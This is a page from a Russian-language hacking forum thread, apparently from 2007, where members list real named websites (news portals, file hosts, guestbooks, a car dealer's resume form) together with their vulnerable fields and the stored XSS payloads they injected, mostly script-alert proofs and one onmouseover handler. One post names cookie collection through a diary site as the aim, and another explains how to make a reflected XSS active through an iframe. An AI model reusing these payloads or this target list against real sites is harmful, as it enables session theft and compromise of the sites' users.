HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Активные Xss
   
Ответ
Страница 8 из 54 « Первая < 4 5 6 7 8 9 10 11 12 18 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 06.07.2007, 22:46
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
С нами: 10051477

Репутация: 136
По умолчанию
www.internet.ru

Уязвимые поля: "Ваше имя";"Тема".
Добавление комментарий: <script>alert()</script>

Пример: http://www.internet.ru/news/2007-06-17409#comment-16117
Последний раз редактировалось V.I.P; 06.07.2007 в 22:50..
 
Ответить с цитированием

  #72  
Старый 23.07.2007, 11:05
Elvis000
Постоянный
Регистрация: 23.04.2007
Сообщений: 646
С нами: 10027046

Репутация: 1035


По умолчанию
англииская газетенка

http://www.accringtonobserver.co.uk/news/comments/form.html?story_id=230456
 
Ответить с цитированием

  #73  
Старый 27.07.2007, 00:04
mister
Познающий
Регистрация: 24.07.2007
Сообщений: 31
С нами: 9895235

Репутация: 35
По умолчанию
nm.ru
http://www4.nm.ru/users/reg.dhtml?__post=1&login=asdasdasdasd&domain=<scri pt>alert()</script>&passwd=asd&pass2=asd&quest_helper=&quest=& answ=
это пассивная xss.
чтобы сделать ее активной, пишем html-мессагу и подключаем xss через ифрейм.
 
Ответить с цитированием

  #74  
Старый 02.08.2007, 03:37
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию
http://www.hotfile.ru
Закачиваем файл любой, в поле "Описание" суем наш зловредный код.
В данном случае
Код:
'"/><script>alert(/xss/)</script>
Получаем линк на скачивание, смотрим - активная хсс
Пример - http://www.hotfile.ru/52377/

http://meetfile.com
Зарегистрировались, заходим в профиль, изменяем его..
Уязвимы все поля...
Код:
'"/><script>alert(/xss/)</script>
Последний раз редактировалось Isis; 02.08.2007 в 03:55..
 
Ответить с цитированием

  #75  
Старый 09.08.2007, 19:12
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию
dump.ru
уязвимо поле "Tags:" при заливке файла.
 
Ответить с цитированием

  #76  
Старый 20.08.2007, 01:09
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами: 10153766

Репутация: 2565
По умолчанию
Дневник на sestrenka.ru
Заводим дневник->постим сообщение в виде хтмл->собираем куки =)
пример
 
Ответить с цитированием

  #77  
Старый 27.08.2007, 16:48
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами: 10240166

Репутация: 2097
По умолчанию
http://www.fos.ru/
Заходим в гостевую книгу, нажимаем создать новое сообщение и пишем:
Код:
'><script>alert('xss')</script>
уязвимы все поля
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #78  
Старый 29.08.2007, 17:08
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами: 10240166

Репутация: 2097
По умолчанию
http://provodka.ru/news.php?part=3&id=7545
Оставляем комментарий такого содержания:
Код:
"/><script>alert(/xss/)</script>
уязвимы оба поля
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #79  
Старый 30.08.2007, 13:58
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
С нами: 10001186

Репутация: 247
По умолчанию
1. Сервис загрузки файлов на сервер http://ifile.kiev.ua/
В поле "ОПИСАНИЕ" пишем
Код:
'"/><script>alert(/xss/)</script>
Пример http://ifile.kiev.ua/download_file/618/

2. Сервис загрузки файлов на сервер http://www.sendfiles.com.ua
После загрузки файла, в описании пишем
Код:
'><script>alert(/xss/)</script>
Пример http://www.sendfiles.com.ua/24431


UPD
тут же: При добавлении коментария, пишем в поле "Отзыв"
Код:
<script>alert(/xss/)</script>
Последний раз редактировалось n3m0; 30.08.2007 в 15:51..
 
Ответить с цитированием

  #80  
Старый 02.09.2007, 17:08
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами: 10240166

Репутация: 2097
По умолчанию
http://www.skoda-russia.ru/resume.php
Оставляем комментарий такого вида:
Код:
"><font color=red onmouseover=javascript:alert('xss')>алерт работает!</font>
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием
Ответ
Страница 8 из 54 « Первая < 4 5 6 7 8 9 10 11 12 18 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.